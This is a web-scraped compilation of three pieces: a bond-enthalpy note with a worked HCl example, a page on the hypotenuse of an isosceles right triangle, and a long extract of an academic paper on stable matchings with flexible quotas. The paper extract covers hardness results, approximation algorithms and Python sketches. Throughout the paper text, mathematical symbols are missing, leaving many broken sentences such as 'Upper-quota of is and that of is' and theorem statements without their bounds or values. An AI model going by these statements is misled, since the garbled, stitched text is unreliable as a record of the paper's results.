$\Delta H$ = Energy of reactant bonds broken $-$ Energy of product bonds formed
A reaction is therefore endothermic ($\Delta H$ is positive) if the bonds broken are stronger than the bonds formed.
A reaction is exothermic ($\Delta H$ is negative) if the bonds formed are stronger than the bonds broken.
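Worked example (with approximate bond energies, quoted only for illustration): for the reaction $H_2 + Cl_2 \rightarrow 2HCl$, the bonds broken are one $H-H$ bond ($\approx 436$ kJ/mol) and one $Cl-Cl$ bond ($\approx 242$ kJ/mol), and the bonds formed are two $H-Cl$ bonds ($\approx 431$ kJ/mol each). Therefore $\Delta H \approx (436 + 242) - 2(431) = -184$ kJ/mol; the bonds formed are stronger than the bonds broken, so the reaction is exothermic.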
http://reformatusegyhazmontreal.ca/gpm-to-npp/calculate-the-hypotenuse-of-an-isosceles-triangle-2b0b2b
# Calculate the hypotenuse of an isosceles triangle
An isosceles right triangle (the 45°-45°-90° triangle) has two legs of equal length and two equal 45° angles. By the Pythagorean theorem, if each leg has length a, the hypotenuse c satisfies c² = a² + a² = 2a², so c = a√2. Conversely, given the hypotenuse, each leg is a = c/√2.
For example, if the hypotenuse is 5√2 cm, then 2a² = (5√2)² = 50, so a² = 25 and each leg is 5 cm.
Likewise, if the hypotenuse is 7√2, each leg is 7√2/√2 = 7, and the area is (1/2)·7·7 = 24.5 square units.
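As a quick numerical check of the 7√2 example above, here is a short added Python snippet (not part of the original page):
import math

c = 7 * math.sqrt(2)      # hypotenuse of the isosceles right triangle
leg = c / math.sqrt(2)    # the legs satisfy c = leg * sqrt(2), so leg = 7.0
area = 0.5 * leg * leg    # 24.5
print(leg, area)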
https://deepai.org/publication/stable-matchings-with-flexible-quotas | Stable Matchings with Flexible Quotas
We consider the problem of assigning agents to programs in the presence of two-sided preferences. Each agent has to be assigned to at most one program and each program can accommodate multiple agents. However unlike the standard setting of school choice, we do not have fixed upper quotas with programs as an input – instead we abstract it as a cost associated with every program. This setting enables the programs to control the number of agents assigned to them and is also applicable in the two-round setting (Gajulapalli et al., FSTTCS 2020) where largest stable extension is computed. In this setting, our goal is to compute a min-cost stable matching that matches all the agents. We show that the problem is NP-hard even under very severe restrictions on the instance. We complement our negative results by presenting approximation algorithms for general case and a fast exponential algorithm for a special case.
• Envy-freeness and Relaxed Stability for Lower-Quotas: A Parameterized Perspective
We consider the problem of assigning agents to resources in the two-side...
06/18/2021 ∙ by Girija Limaye, et al.
• Solving Hard Stable Matching Problems Involving Groups of Similar Agents
Many important stable matching problems are known to be NP-hard, even wh...
08/14/2017 ∙ by Kitty Meeks, et al.
• How hard is it to satisfy (almost) all roommates?
The classical Stable Roommates problem (which is a non-bipartite general...
07/13/2017 ∙ by Jiehua Chen, et al.
• The Three-Dimensional Stable Roommates Problem with Additively Separable Preferences
The Stable Roommates problem involves matching a set of agents into pair...
07/09/2021 ∙ by Michael McKay, et al.
• Robust and Approximately Stable Marriages under Partial Information
We study the stable marriage problem in the partial information setting ...
04/24/2018 ∙ by Vijay Menon, et al.
• Matchings with Group Fairness Constraints: Online and Offline Algorithms
We consider the problem of assigning items to platforms in the presence ...
05/20/2021 ∙ by Govind S. Sankar, et al.
• Min-Max Tours for Task Allocation to Heterogeneous Agents
We consider a scenario consisting of a set of heterogeneous mobile agent...
03/26/2018 ∙ by Amritha Prasad, et al.
1 Introduction
In this paper we consider the problem of assigning agents to programs where agents need to be assigned to at most one program and each program can accommodate multiple agents. Both agents and programs rank a subset of elements from the other set. Typically, each program specifies an upper-quota denoting the maximum number of agents that can be assigned to the program. This setting models important real-world applications like assigning students to schools [1], residents (medical interns) to hospitals [9], under-graduate students to university programs [3] and students to elective courses [16] to name a few. In many scenarios the procedure of assigning agents to programs operates as follows: agents and programs submit their preferences and quotas to a central administrative authority and the central authority outputs the assignment. An assignment or matching is stable if no agent-program pair has incentive to deviate from .
In the above setting, the task of assigning agents to programs by the central authority is complicated by the presence of high demand programs with limited quotas. Consider the instance in Fig. 1 with five agents and two programs . Upper-quota of is and that of is . Preferences are interpreted as follows - Agent prefers over , and so on. We note that is a popular program since four agents rank the program as top-choice. In this instance, any stable matching with the given quotas leaves agents and unmatched. However, in many applications like school-choice [1] and elective allocation to students, it is undesirable to leave agents unmatched. Furthermore, the quotas specified by the programs are typically derived from some practical considerations like class size and resources and need not be rigid. Thus, in order to enable a larger set of agents to be matched, programs may be willing to increase the quotas, depending on the resources. To model such scenarios, we introduce and study the notion of stable matchings with flexible quotas. If quotas were completely flexible, a simple solution would be to match every agent to its top choice program. In the instance in Fig. 1
this leads to the skewed matching in which is matched to and the rest of the agents are matched to . This is unacceptable as well in practice. Thus in our model, we let the costs control quotas.
Controlling quotas via costs. Suppose that instead of fixed quotas, a cost is associated with every program. The cost specifies the effective cost of matching a certain number of agents to the program. Since the quotas are controlled by the cost and are not rigid, every agent could be matched. In the instance in Fig. 1, instead of providing quotas, assume that the programs specify the following information: the cost of matching a single agent to is and the cost of matching a single agent to is . In practice, high-demand or popular courses may have a higher cost per matched agent. Our goal is to compute a stable matching in the instance that matches every agent and has minimum cost. We call this the stable matchings with flexible quotas () problem. We remark that our problem is significantly different from the well-studied minimum weight or maximum weight stable matching problem [13] since we have flexible quotas. In the instance in Fig. 1 it is easy to verify that when there are no initial quotas, the matching is stable, and has a cost of and is indeed a min-cost stable matching given the costs for the programs.
Formally, in the problem we are given a set of agents and a set of programs , their preference lists and the cost associated with each program. Our goal is to compute an -perfect stable matching (in which all agents are matched) with the minimum total cost. We note that in our model, since costs control quotas of programs, in some cases, programs may even be closed, that is, no agent gets assigned to the program in the output matching. However, our output matching is guaranteed to be -perfect and stable.
Length of the preference lists in the setting. We note that the problem is trivially solvable in polynomial time when all preference lists are of unit length. The problem is also polynomial-time solvable when the preference lists are complete (all agents list all programs) using the following idea - pick a program with the least cost and match every agent to it. It is clear that this computes an -perfect, stable matching. Also, it is easy to see that the matching is optimal. Since we guarantee that every agent is matched, a natural strategy for agents is to submit short preferences; in fact, agents may simply submit only their true top-choice program. However, since -perfectness is promised, the central authority may impose a lower-bound on the number of preferences submitted by an agent [12]. We show that the problem is NP-hard even in this case. We also consider whether the problem is tractable when the number of distinct costs in the instance is small. However, we prove that the hardness holds even in this case. The problem is NP-hard even when every agent has a preference list of length exactly for some constant. This hardness result holds even when there are distinct costs in the instance. We also show that the problem is hard to approximate within a constant factor, unless . It cannot be approximated within a factor unless . This hardness of approximation holds even when there are distinct costs in the instance. We present a fast exponential algorithm for the instances where the number of distinct costs is small. Note that the number of distinct costs appearing in an agent’s preference list is upper-bounded by the number of distinct costs in the instance as well as by the length of the preference list of the agent. The problem can be solved in time, where is the maximum number of distinct costs that appear in an agent’s preference list. For the general case of the problem, we present the following two approximation algorithms:
1. a |P|-approximation algorithm
2. a linear-time ℓp-approximation algorithm, where ℓp denotes the maximum length of the preference list of any program.
We also present a better approximation guarantee for instances in which agents have short preference lists: SMFQ admits a -approximation algorithm when agents have exactly two programs in their preference list.
Table 1 summarizes our results.
Stable extensions. A recent work by Gajulappali et al. [8] studies a two round mechanism for school-choice where the student-optimal stable matching is computed with initial parameters in the first round. In the second round, some parameters of the problem change, for instance, schools may add more seats (increase the quotas), new students may arrive, new schools may open, and so on. In the Type A1 setting [8], the goal in the second round is to compute a largest stable extension of by appropriately increasing the quotas of schools. Gajulappali et al. [8] present a polynomial time algorithm for this setting. For the instance in Fig. 1, matching is the student-optimal matching. Algorithm in [8] computes as the stable extension of .
An instance may admit multiple stable matchings and by the Rural Hospital Theorem [18], the set of agents unmatched in the first round is independent of the stable matching. However, the subset of these agents that can be matched in the second round to obtain a stable extension is dependent on the specific matching computed in the first round. In this work, we show that every largest stable extension of a fixed stable matching matches the same set of agents and that among all the stable matchings computed in the first round, the largest stable extension of the student-optimal matching has maximum size.
Largest min-cost stable extension. We observe that in the second round, quota is added to the programs that are fully-subscribed in the first round. Thus, the additional agents that get assigned in the second round may cause overhead at these programs. We note that the stable extension computed in [8] matches every agent that can be matched in the second round to her top choice. This may result in a skewed matching if a subset of programs is in high demand. In this work, we extend the Type A1 setting [8] using the SMFQ model. That is, in addition to the initial quotas, each program specifies a cost which is used to control the increments in the quota in the second round, and the goal is to compute a largest stable extension at minimum cost. In the instance in Fig. 1, if ’s cost is and ’s cost is , then the largest min-cost stable extension is . Note that the assignment of unmatched agents in is less skewed in than in .
We note that Gajulappali et al. [8] consider a variant of the SMFQ problem (Problem 33, Section 7) and state that their problem is NP-hard. However, that is not a central problem studied in their work, and they do not investigate its computational complexity in detail.
1.1 Related Work
The size of a matching is an important criterion in many applications, and in this direction relaxations of stability, like the notion of popularity [11] and maximum matchings with the least number of blocking pairs [5], have been studied. We have already mentioned the work by Gajulappali et al. [8], in which the instance in the second round has flexible quotas. Flexible quotas in the college admission setting are studied in [17]. In their setting, students have strict preferences but colleges may have ties, that is, colleges may have more than one student at the same rank. They consider that colleges have fixed quotas initially and flexible quotas are used for tie-breaking at the last matched rank. In their work, no costs are involved. In a different setting of college admissions, [4] study the problem of assigning students to colleges where colleges have a lower quota and a college either fulfills the lower quota or is closed. In their setting, the stability notion also considers closed schools. Under this modified notion of stability, a stable matching may fail to exist, and they show that deciding if a stable matching exists is NP-hard.
Budget and funding constraints are also studied in [14, 2]. The setting where courses make monetary transfers to the students and have a budget constraint is studied in [14]. Unlike in the standard setting, stable matchings may not exist in their setting; they present approximately stable matchings using matching with contracts. Funding constraints are also studied in [2] in the context of allocating student interns to projects funded by supervisors. They introduce the concepts of strong stability and weak stability and present an algorithm for computing a weakly stable matching. The course allocation problem with high-demand courses is studied in [16, 10, 19]. A setting involving high-demand courses and scheduling constraints is studied in [16], which assumes a fixed quota at courses. Course allocation involving efficient assignment of students to highly popular courses is treated with an AI approach in [10]. Course bidding mechanisms for allocating seats efficiently at high-demand courses are investigated in [19].
Organization of the paper: In section 2, we give an overview of stable matchings and stable extensions and define the problem setup. We present our algorithmic results for the problem in section 3. In section 4, we present -hardness and inapproximability results for the problem. We conclude in section 5.
2 Preliminaries and Background
In this section, we first present stable matchings in the classical single-round setting and define the notation used in this paper. We then formally define the SMFQ problem, followed by a discussion of some properties of stable extensions [8] in the two-round setting.
2.1 Classical stable matchings
We are given a set of agents (students, applicants, residents, and so on) and a set of programs (schools, courses, colleges, posts, hospitals, and so on) . Each agent and program ranks an arbitrary subset (also called its acceptable subset) from the other side in a strict order. This ranking is called the preference list of the element. An agent is acceptable to program if and only if is acceptable to . A program has an associated upper quota, denoted by . If prefers over , we denote it by .
Such an instance can be modelled as a bipartite graph such that if and only if and are mutually acceptable to each other. A matching in is an assignment of agents to programs such that each agent is matched to at most one program and a program is matched to at most many agents. Let denote the program that agent is matched to in and denote the set of agents matched to program in matching . If is unmatched in , we denote it by . We consider as a less-preferred choice for any when compared to any program in her acceptable subset. A program is called under-subscribed in if and fully-subscribed in if . In this setting, stability is defined as follows. [Classical stable matchings] A pair is a blocking pair w.r.t. the matching if and is either under-subscribed in or there exists at least one agent such that . A matching is stable if there is no blocking pair w.r.t. . It is well known that every instance of the stable matching problem admits a stable matching and it can be computed in linear time by the well-known Gale and Shapley [9] algorithm.
2.2 SMFQ problem setup
In the SMFQ problem, we are given a set of agents and a set of programs , their preference lists, and the cost associated with each program. We assume that the costs are integral. Our goal is to compute an -perfect stable matching that achieves the minimum cost. In our model there are no fixed quotas, hence no program is under-subscribed; in fact, some programs may have no agents assigned to them. We denote such programs as closed. We modify the definition of stability in our setting as follows, and throughout the paper we refer to this notion of stability. [Stable matchings with flexible quotas] A pair is a blocking pair w.r.t. the matching if and there exists at least one agent such that . A matching is stable if there is no blocking pair w.r.t. . In the literature, such a blocking pair is also called an envy pair and the matching is called envy-free. In the standard setting, an envy-free matching need not be stable, but in our setting of flexible quotas, envy-free matchings are indeed stable. A stable matching in our setting is Pareto cost-optimal if no agent can be promoted (that is, matched to a higher-preferred program) without increasing the cost of the matching.
2.3 Stable extensions
In this section, we define the notion of stable extensions [8] and present some properties of largest stable extensions. Let denote the classical stable matching instance, that is, the bipartite graph along with the preference lists and quotas. Let be a stable matching in . A stable extension of is defined as follows. [Stable extension] Matching is an extension of if no agent matched in changes her matched program, that is, . An extension of is a stable extension if is stable. We note that in no unmatched agent forms a blocking pair with an under-subscribed program. If agent is unmatched in but matched in to program , then must be fully-subscribed in and the number of residents matched to in is larger than its initial quota.
Properties of largest stable extensions. Let be the set of agents that can be matched in a largest stable extension of . For the instance given in Fig. 1, if then . Gajulappali et al. [8] present a polynomial time algorithm to compute (denoted as the set in line 3, Fig. 1 [8]) and then match every agent in . Below, we present an equivalent algorithm (Algorithm 1) to compute the set . We use the notion of barrier as defined in [8] which is similar to the notion of threshold resident defined in [15]. Let be the set of agents unmatched in the given matching . Then . For every program , we prune the preference list of by deleting the edges of the form such that appears after Barrier() in ’s list. We denote this pruned graph after the for loop in line 5 as . We return the set as the set of agents who are not isolated in . We note the following properties of the set .
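To make the pruning step concrete, the following Python sketch mirrors Algorithm 1 under assumptions of ours: preference lists are dictionaries of ordered lists (most preferred first), the first-round matching M maps matched agents to programs, Barrier(p) is read as the least-preferred agent assigned to p in M (the authoritative definition is the one in [8]), and the returned set is restricted to the agents unmatched in M.

def matchable_in_largest_stable_extension(pref_a, pref_p, M):
    # rank[p][a] = position of agent a in p's preference list (0 = most preferred)
    rank = {p: {a: i for i, a in enumerate(lst)} for p, lst in pref_p.items()}
    matched_to = {}
    for a, p in M.items():
        matched_to.setdefault(p, []).append(a)
    # Assumed reading of Barrier(p): the least-preferred agent matched to p in M.
    barrier = {p: max(agents, key=lambda a, p=p: rank[p][a])
               for p, agents in matched_to.items()}
    survivors = set()
    for a in pref_a:
        if a in M:
            continue                      # only agents unmatched in M are of interest here
        for p in pref_a[a]:
            # Keep the edge (a, p) only if a appears before Barrier(p) in p's list.
            if p in barrier and a in rank[p] and rank[p][a] < rank[p][barrier[p]]:
                survivors.add(a)          # a is not isolated in the pruned graph
                break
    return survivors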
P1. For the stable matching , the set is unique. This is clear by observing that Barrier() for each is unique with respect to the stable matching .∎
Next we note that the set is independent of the stable matching but the set depends on a specific stable matching . In the instance in Fig. 1, we saw that if then but if then . We show the following property about the largest stable extensions of different stable matchings.
P2. In the Type A1 setting [8], among all the stable matchings in the first round, the agent-optimal matching achieves the largest stable extension.∎
To prove P2, it is enough to show that the agent-optimal stable matching has the largest set . Let be the agent-optimal stable matching. Then for any stable matching , .
Proof.
Suppose for the contradiction that, . Let and be the pruned graphs after for loop in line 5 in Algorithm 1 w.r.t. and respectively. Thus there exists an agent ; that is, agent has degree at least one in but degree in . Let . Thus, there exists agent such that . But since , we have . But the agent-optimality of implies that for every agent . This contradicts that . Hence, . ∎
We also note the following stronger property about .
P3. The set of edges deleted in is a superset of set of edges deleted in the pruned graph of any other stable matching .∎
To see P3, observe that for agent , . Thus, if Barrier() in then Barrier() in . Thus, . We can generalize P2 as follows.
P4. If the underlying sets are and and if quotas for elements in set are increased in the second round, then -optimal stable matching achieves the largest stable extension.∎
Computing a largest min-cost stable extension. If, in addition to the initial quotas, the programs also specify costs, then in the second round of the Type A1 setting [8] a largest min-cost stable extension is given by an optimal solution to the following SMFQ instance: the set of programs remains the same, the set of agents is the same as the set , and the preference lists are restricted to the subset of edges in .
2.4 Our techniques
We note that a simple lower bound on an optimal solution of SMFQ exists, computed by summing up the cost of a least-cost program appearing in every agent’s preference list. We use this lower bound for the ℓp-approximation algorithms and show that the analysis of our algorithms is tight. We also present a weaker lower bound using an auxiliary problem and derive a |P|-approximation algorithm from it. We present a linear program for the SMFQ problem and use LP rounding for the restricted case when agents have short preference lists.
3 Algorithmic results
In section 3.1, we present a fast exponential algorithm for the SMFQ problem when the number of distinct costs in the instance is small. In section 3.2 we first present an approximation algorithm with guarantee |P| using a new auxiliary problem. Then we present two simple approximation algorithms that have the same approximation guarantee of ℓp, where ℓp is the length of the longest preference list of a program. These algorithms work on arbitrary instances. In section 3.3, we present a -approximation algorithm for the restricted instances where every agent's preference list has exactly two programs.
3.1 Exact exponential algorithm for SMFQ
In this section we present an exact exponential algorithm for with running time where is the maximum number of distinct costs that appear in an agent’s preference list. Let be the number of distinct costs in the given instance and let be the set of distinct costs. Then . Also where is the maximum length of an agent’s preference list. Our algorithm (Algorithm 2) considers every possible -tuple of costs such that each for some . Thus, there are tuples. For each tuple, the algorithm constructs a sub-graph such that every agent has edges incident to programs with cost exactly . For any agent if is the highest preferred program neighbouring in then any program in the graph cannot be matched with any agent . The algorithm prunes the graph to remove such edges repeatedly. If an agent is isolated after the pruning, the current tuple is discarded. Otherwise, the algorithm matches every agent to the top choice program in this pruned graph. The algorithm picks a least-cost matching among the matchings computed for the non-discarded tuples and returns .
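To illustrate the tuple-enumeration idea, here is a small Python sketch. It is a reconstruction under assumptions of ours rather than the pseudo-code of Algorithm 2: pref_a and pref_p are ordered preference lists (most preferred first), mutual acceptability is assumed, cost maps programs to integer costs, and the pruning rule is our reading of the envy-freeness requirement (once agent a can only be matched to its current top choice p, every agent that p prefers to a must not end up at a program she likes less than p).

from itertools import product

def exact_smfq(pref_a, pref_p, cost):
    agents = list(pref_a)
    rank_p = {p: {a: i for i, a in enumerate(lst)} for p, lst in pref_p.items()}
    # One candidate cost per agent, drawn from the distinct costs on her own list.
    choices = [sorted({cost[p] for p in pref_a[a]}) for a in agents]
    best = None
    for tup in product(*choices):
        # Sub-graph for this tuple: agent a keeps only programs of her chosen cost.
        adj = {a: [p for p in pref_a[a] if cost[p] == c] for a, c in zip(agents, tup)}
        changed = True
        while changed:
            changed = False
            for a in agents:
                if not adj[a]:
                    continue
                p = adj[a][0]                         # a's most-preferred surviving program
                for b in agents:
                    if b == a or p not in pref_a[b]:
                        continue
                    if rank_p[p][b] < rank_p[p][a]:   # p prefers b to a
                        cut = pref_a[b].index(p)
                        keep = [q for q in adj[b] if pref_a[b].index(q) <= cut]
                        if len(keep) != len(adj[b]):
                            adj[b] = keep
                            changed = True
        if any(not adj[a] for a in agents):
            continue                                  # invalid tuple: some agent is isolated
        M = {a: adj[a][0] for a in agents}            # everyone gets her surviving top choice
        total = sum(cost[M[a]] for a in agents)
        if best is None or total < best[0]:
            best = (total, M)
    return best                                       # (minimum cost, matching) over valid tuples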
Correctness. First note that for tuple , if an agent has degree after the pruning of (line 12) then no matching is computed for . In this case we say that is invalid, otherwise is valid. Algorithm computes a matching for each valid tuple and the min-cost matching among these is returned. Consider the cost tuple where each agent’s cost corresponds to the cost of top choice program in her list in . When the algorithm processes this tuple, it will result in the graph such that no deletions happen in line 10. Thus, there is at least one valid tuple and hence, Algorithm 2 computes at least one -perfect matching. The matching computed by Algorithm 2 is stable.
Proof.
The matching is actually matching computed for some valid tuple. Thus, it is enough to show that computed for an arbitrary valid tuple is stable.
Suppose is not stable, then there exists agents such that and and . If at line 13 then , a contradiction. Hence, . If after line 3 then note that edge is deleted at line 10. Otherwise, was deleted in some iteration of the edge deletion loop. This implies that there exists that triggered this deletion. But, then we have that , implying that is also deleted. Thus, in both the cases, and hence . This contradicts the assumption that and hence completes the proof. ∎
Thus we showed that the algorithm computes at least one -perfect, stable matching. We now show that the algorithm computes the min-cost (optimal) matching.
Let be an -perfect stable matching and be the tuple corresponding to . Then no edge in is deleted when Algorithm 2 processes .
Proof.
Suppose for the sake of contradiction that an edge in is deleted when Algorithm 2 processes the tuple . Let be the first edge in that gets deleted during the course of the algorithm. The edge is in after line 3 since has the same cost as given by the tuple . This implies that the edge is deleted while pruning the instance. Suppose agent caused the deletion of edge at time . Let . Then it is clear that either or , otherwise is not stable. But since triggered the deletion of , the top choice program adjacent to in at time is less preferred than . Again note that after line 3 hence must have been deleted at time earlier than . This contradicts the assumption that is the first edge in that gets deleted. This completes the proof. ∎
Thus, when the algorithm processes the tuple corresponding to an -perfect stable matching, every agent has a degree at least at line 12, that is, that tuple is valid. Thus, the tuple corresponding to an optimal matching is also valid and hence Algorithm 2 computes matching for it. Since Algorithm 2 returns the matching with cost at most the cost of , it implies that it returns a min-cost -perfect stable matching.
Running Time. Algorithm 2 processes tuples. For each tuple it computes the graph in time, where is the number of edges in . The while loop can be efficiently implemented by keeping track of the most-preferred program considered so far for every agent. The while loop thus takes time because it deletes edges. Matching can be computed in time . Hence the Algorithm 2 runs in time .
This establishes Theorem 1.
3.2 Approximation algorithms for arbitrary SMFQ instances
In this section, we present approximation algorithms for arbitrary SMFQ instances. The first algorithm has an approximation guarantee of |P|. The next two approximation algorithms have a guarantee of ℓp, where ℓp is the length of the longest preference list of a program.
3.2.1 |P|-approximation
In this section we present an approximation algorithm for with ratio . We define an auxiliary optimization problem and present a polynomial time algorithm for . We then claim a lower bound and an approximation guarantee using the optimal solution of .
The auxiliary problem. We are given an instance of SMFQ. In the auxiliary problem, our goal is to compute an -perfect stable matching that minimizes the maximum cost spent at a program. Recall that in the SMFQ problem, our goal is to compute an -perfect stable matching with minimum total cost.
Now we show that the auxiliary problem is in P (see Algorithm 3). We start with an empty matching . Since costs can be , the minimum cost spent at a program can be . If is the maximum cost in , then any -perfect matching has cost at most . We start with the range where and . Let . We set upper quotas at every program such that the maximum cost spent at a program is . We then compute a stable matching using the Gale and Shapley algorithm [9]. If is not -perfect, then we search for the optimal cost value in the range . Otherwise, we set upper quotas at every program such that the maximum cost spent at a program is at most and compute a stable matching . If is not -perfect then we return ; otherwise we search for the optimal cost value in the range . We prove the correctness of the algorithm below.
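The binary-search idea can be sketched in Python as follows, again under assumptions of ours: costs are non-negative integers, a per-program budget g is translated into the upper quota g // c(p) (unbounded when c(p) = 0), and gale_shapley is an externally supplied routine returning an agent-optimal stable matching (as a dict from matched agents to programs) for the given quotas.

def min_max_spend(pref_a, pref_p, cost, gale_shapley):
    n = len(pref_a)
    lo, hi = 0, n * max(cost.values())       # spending hi at a program always suffices
    best = None
    while lo <= hi:
        g = (lo + hi) // 2
        # Quotas under which no program spends more than g.
        quota = {p: (n if cost[p] == 0 else g // cost[p]) for p in pref_p}
        M = gale_shapley(pref_a, pref_p, quota)
        if all(a in M for a in pref_a):      # A-perfect: every agent is matched
            best, hi = M, g - 1              # feasible, try a smaller budget
        else:
            lo = g + 1                       # infeasible, a larger budget is needed
    return best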
The matching computed by Algorithm 3 is -perfect and stable.
Proof.
By line 6 and line 7, the claim follows. ∎
Suppose is the maximum cost spent at a program in an optimal solution of . Let be the instance in which every program has maximum upper-quota that can be fulfilled in cost at most , that is, the maximum cost spent at a program is . Then, for are infeasible instances of and are feasible instances of .
The matching computed by Algorithm 3 is an optimal solution.
Proof.
The claim follows from Remark 3.2.1 since Algorithm 3 computes the matching by binary searching over the range . ∎
Running time. Since the algorithm uses binary search, it takes iterations. In each iteration it sets the quotas in time, computes at most two stable matchings in time, and performs a constant number of additional operations; thus every iteration takes time, where is the number of edges in the underlying bipartite graph of the instance. Thus, the algorithm runs in time .
|P|-approximation for SMFQ. Suppose is the cost of an optimal solution of the auxiliary problem, that is, there exists an -perfect stable matching in such that is the maximum cost spent at a program in , and for every , there does not exist a stable -perfect matching where the cost spent at every program is at most . Then we show that is a lower bound on the cost spent in an optimal solution of SMFQ (Claim 3.2.1). Using this lower bound, we show the approximation guarantee of |P| for the output of Algorithm 3 for SMFQ (Claim 3.2.1).
The cost of an optimal solution of is at least .
Proof.
Suppose for the sake of contradiction that cost of the optimal solution of is . Note that is an -perfect stable matching, implying that is a feasible solution for . Also note that has the total cost which is the summation of costs spent at every program. Thus, the cost spent at any program in is at most , implying that the maximum cost spent at a program in is at most . This implies that itself is an optimal solution for , contradicting that is the maximum cost spent at a program in an optimal solution of . ∎
Let be the instance of . Matching computed by Algorithm 3 on is an -approximation of on .
Proof.
Let be an optimal solution of . Matching computed by Algorithm 3 is -perfect and stable. Let be the maximum cost spent at a program in . Thus the total cost of matching is at most . By the claim 3.2.1, , thus is an -approximation for . ∎
This establishes Theorem 1 a.
Remarks about Algorithm 3. We note that the actual total cost of the optimal matching of is at most where is the number of programs that are open. Since , the analysis is not tight with respect to the factor . However consider the instance in Example 3.2.1 where the total cost of optimal matching of is exactly . Suppose there are 3 agents and programs . Cost of is and that of is . Preference lists are shown below. It is clear that the optimal solution for is with cost . The optimal solution of is with cost . The number of open programs in is and the total cost of is .
3.2.2 ℓp-approximation
In this section we present two linear-time algorithms, denoted ALG1 and ALG2, for the SMFQ problem. We show that both algorithms have an approximation guarantee of ℓp, where ℓp denotes the length of the longest preference list of any program. We show that there exist simple examples where one of them is better than the other; hence, in practice, we run both algorithms and output the matching that has the minimum cost amongst the two. For our algorithms we need the following definition. Let denote the least-cost program in the preference list of agent . If there is more than one program with the same minimum cost, we let be the most preferred amongst these programs.
Description of ALG1: Given an instance , we construct a subset of such that iff for some agent . Our algorithm now matches every agent to the most-preferred program in . The pseudo-code can be found in Algorithm 4.
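A minimal Python sketch of ALG1 under the conventions used in the other sketches (ordered preference lists; the least-cost program of each agent, with ties broken towards the more preferred one, plays the role of the program defined above):

def alg1(pref_a, cost):
    # p_star[a]: a's least-cost program, the most preferred one in case of ties
    p_star = {}
    for a, plist in pref_a.items():
        cmin = min(cost[p] for p in plist)
        p_star[a] = next(p for p in plist if cost[p] == cmin)
    P_star = set(p_star.values())
    # Match every agent to her most-preferred program inside P_star.
    return {a: next(p for p in plist if p in P_star) for a, plist in pref_a.items()}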
Analysis of ALG1: It is clear that the matching computed by ALG1 is -perfect. Let be the output of ALG1 and be an optimal matching. Let and be the cost of matching and respectively. It is easy to see that
$c(\mathit{OPT}) \;\geq\; \sum_{a \in A} c(p^{*}_{a})$
We show the correctness and the approximation guarantee of ALG1 via Lemma 3.2.2 and Lemma 3.2.2.
The output of ALG1 is stable.
Proof.
We show that no agent participates in a blocking pair w.r.t. . Recall that no program is under-subscribed w.r.t. . Thus if blocks , it implies that and there exists an agent such that . Since ALG1 assigns agents to programs in only, it implies that . However, is the most-preferred program in and hence . Thus, the claimed blocking pair does not exist. ∎
The output of ALG1 is an -approximation.
Proof.
In the matching , agent is either matched to or for some other agent . This is determined by the relative ordering of and in the preference list of . We partition the agents as , where is the set of agents matched to their own least cost program, that is, iff . We define . We can write the cost of as follows:
We now observe that any program that is a least cost program for some agent in can be matched to at most many agents from . Thus, the cost of is upper bounded as follows:
$c(M) \;\leq\; \sum_{a \in A} c(p^{*}_{a}) + \sum_{a \in A} (\ell_p - 1) \cdot c(p^{*}_{a}) \;=\; \sum_{a \in A} \ell_p \cdot c(p^{*}_{a}) \;\leq\; \ell_p \cdot c(\mathit{OPT})$
This proves the approximation guarantee. ∎
We now present our second algorithm.
Description of ALG2: Given an instance , ALG2 starts by matching every agent to . Note that such a matching is -perfect and min-cost but not necessarily stable. Now the algorithm considers programs in an arbitrary order. For program , we consider agents in the reverse preference list ordering of . Note that if there exists agent such that and there exists such that , then envies and forms a blocking pair. We resolve this by promoting from to . The algorithm stops when we have considered every program. The pseudo-code can be found in Algorithm 5.
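A Python sketch of ALG2 following the description above (same conventions and the same least-cost tie-breaking as in the ALG1 sketch; mutual acceptability is assumed):

def alg2(pref_a, pref_p, cost):
    def p_star(a):
        cmin = min(cost[p] for p in pref_a[a])
        return next(p for p in pref_a[a] if cost[p] == cmin)

    M = {a: p_star(a) for a in pref_a}       # A-perfect and min-cost, but maybe unstable
    for p, plist in pref_p.items():
        lower_ranked_present = False         # has an agent p prefers less already landed at p?
        for a in reversed(plist):            # scan p's list from its least-preferred agent
            if M.get(a) == p:
                lower_ranked_present = True
            elif (a in M and lower_ranked_present and p in pref_a[a]
                    and pref_a[a].index(p) < pref_a[a].index(M[a])):
                M[a] = p                     # a envied an agent assigned to p: promote a
                lower_ranked_present = True
    return M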
We observe the following about ALG2. An agent only gets promoted in the loop at line 5 of the algorithm. Further, a program is assigned agents only when it is being considered in the for loop at line 2. Finally, if a program is assigned at least one agent in the final output matching, then for some agent .
Before presenting the correctness and approximation guarantee of ALG2, we present the following instances, which illustrate that neither of the two algorithms is strictly better than the other.
Let , , where is some large positive constant. The agents have the same preference list followed by . Whereas agent has only in its preference list. The preferences of the programs are as given below.
p1 : a1, a2, …, an−1
p2 : an, an−1, an−2, …, a1
Here, ALG1 outputs of cost where . In contrast, ALG2 outputs whose cost is . Clearly, ALG2 outperforms ALG1 in this case and in fact is optimal for the instance.
Let , , where is some large positive constant. The preferences of agents are followed by followed by . The preference list of contains only and the preference list of contains only . The preferences of programs are as shown below.
p1 : a1, a2, …, an−2
p2 : an−1, a1, a2, …, an−2
p3 : a1, …, an−2, an
Here, ALG1 outputs whose cost is . In contrast, ALG2 outputs of cost where . In this instance ALG1 outperforms ALG2 and it can be verified that is the optimal matching.
Analysis of ALG2: It is clear that the matching computed by ALG2 is -perfect. We show the correctness and the approximation guarantee of ALG2 via Lemma 3.2.2 and Lemma 3.2.2. The matching output by ALG2 is stable.
Proof.
Let be the output of ALG2. We show that no agent participates in a blocking pair w.r.t. . Assume for contradiction, that blocks . Then and there exists an agent such that . Consider the iteration of the for loop in line 2 when was considered. Either was already matched to (before this iteration) or is assigned to in this iteration. Note that prefers over and the agents are considered in reverse order of ’s preferences. Thus if was matched in that iteration to a lower-preferred program than , then must be promoted to . Otherwise, was already matched in that iteration to a better-preferred program. Since agents can only get promoted in subsequent iterations, it contradicts that at the end of the algorithm, agent prefers to . This completes the proof of stability. ∎
The matching output by ALG2 is an -approximation.
Proof.
The proof is similar to the proof of Lemma 3.2.2. Let be the cost of matching output by Algorithm 5. The lower bound on is exactly the same. In the matching , some agents are matched to their least cost program (call them ), whereas some agents get promoted (call them ). However, as noted earlier, if a program is assigned agents in then it must be for some agent . Thus for agent who is not matched to its own least cost post, we charge the cost of some other least cost post . Since a least cost post can be charged at most times by agents in , by a similar argument as in Lemma 3.2.2 we get the approximation guarantee of . ∎
This establishes Theorem 1 b.
